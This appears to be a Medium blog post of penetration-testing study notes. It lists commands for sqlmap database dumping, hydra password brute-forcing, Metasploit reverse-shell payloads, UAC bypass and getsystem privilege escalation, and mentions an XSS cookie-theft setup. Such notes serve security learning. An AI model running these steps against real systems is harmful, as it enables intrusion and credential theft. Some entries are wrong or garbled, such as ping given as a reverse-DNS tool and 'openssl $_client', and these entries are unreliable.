Tools and Commands learned from PTS → elearnsecurity:-


  1. wireshark:-is a protocol analyzer network sniffer, which allows to see the data transmitted over the network. (you will see if the data sent in clear-text or encrypted)
  2. Burp suit:- used to send http\https requests and analyze the requests and responses.
  3. subdomain enumeration tools:

Commands (linux OS):-

  1. To view router table:- ip route
  2. To add a route manually:- sudo ip route add network-ip via gateway-ip
  3. To view ARP Cache:- ip neighbour
  4. To view network statistics and protocols status:- netstat
  5. To do reverse DNS resolution (from DNS name to ip):- ping
  6. To write or read something from web site and send http requests and analyze the requests and responses:- netcat\nc
  7. To write or read something from web site and send https requests and analyze the requests and responses:- openssl $_client -connect.
  8. subdomain enumeration (collect DNS data from various sources: sublist3r, amass
  9. To check if a machine is alive or not we use:-ping
  10. To perform ping sweep:- fping -a -g therange.
  • a → to view only alive hosts → for ping sweep (ip range)
  • P0 → to avoid pinging the host -h the target hosts -s the signature files
GET:- to request web pages and pass arguments.
POST: to submit data in web forms.
HEAD: to show only the header of the responses.
PUT: to upload files to web servers.
DELETE: to remove a file from web servers.
OPTIONS: to query the web server for enabled http verbs.
TCP connection between client and server.
UDP connection between client and server.
TCP connection between client and server and executing shell commands.
  • h → for viewing sqlmap manual.
  • -u → to assign url target.
  • -p → to specify parameters and if we have only one parameter we can ignore it.
  • - -dbms= to specify database name.
  • - -technique= to specify sql injection technique.
  • -b/- -banner → to view banner information.
  • - -tables
  • - -columns
  • - -dump → to view tables entries.
  • - -wizard → to enumerate database for beginners.
  • without any switches/-h → for viewing hydra manual.
  • -U → for viewing details about a module.
  • -L →To lunch a usernames list inside a file.
  • -P →To lunch a passwords list inside a file.
  • module name: target → to specify a module.
  • -L →display all services available in a target.
  • -N →force a tool to not ask for a password.

sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

  • show -h → to view the manual for show command.
  • search → to search about for a given term or module.
  • show exploits → to display exploits.
  • use the path of exploits → to use an exploit.
  • back → to cancel exploitations.
  • info → to display related information.
  • show options → to check exploitation options.
  • set options → to configure options.
  • show payload →to show executable payloads
  • set payload path →to choose payload
  • exploit → lunching an exploit.
  • bind_tcp runs a server process on the target machine that waits for connections from the attacker machine →set payload java/meterpreter/bind_tcp
  • reverse_tcp performs a TCP connection back to the attacker machine →set payload linux/x86/meterpreter/reverse_tcp
  • bypassuac bypass the restriction use exploit/windows/local/bypassuac
  • background → to switch from a Meterpreter session to the console.
  • sessions -l → list opened sessions.
  • sessions -i number of session → to switch toan opened session.
  • sysinfo →retrieve information about the exploited machine.
  • ifconfig →prints the network configuration.
  • route →prints the routing information.
  • getuid — To know which user is running the process.
  • getsystem → privilege escalation.
  • shell → run standard command shell.
  • help →to display all Meterpreter commands.
  1. XSS attack:-
The code in attacker server to save the cookies receive it from victim browser.
Code inserted in web site to infect it.

Commands (Windows OS):-

  1. Tool to display information about the target(file share):-nbtstat
  • /? → to view help manual.
  • A → display information about the target.
  • <00> →means workstation.
  • <02>means there is files sharing.
  • -S → enumerate file shares
  • -U → enumerate users
  • -P →check the password policy




Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Extremo Nieve Coche Invierno Hack Free Resources Generator

1.5 Billion Facebook User Data Is Sold? How Do Ordinary People Get Out of “Trumen’s World”

CyberSec Certification Roadmap

Cybercriminals use Microsoft Teams chat rooms to spread malware

Compression and Encryption in Aerospike’s Backup Tool — Asbackup

Detecting and Protecting Your Smartphone From Pegasus Spyware

Private story of a “Hacker” (Chapter 1)

Oracle Fusion Cloud Security Model

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


More from Medium

How to bypass Windows 10 UAC with Python

My First Forensic Analysis of An Image File.


4 Epic Cybersecurity Tools and Techniques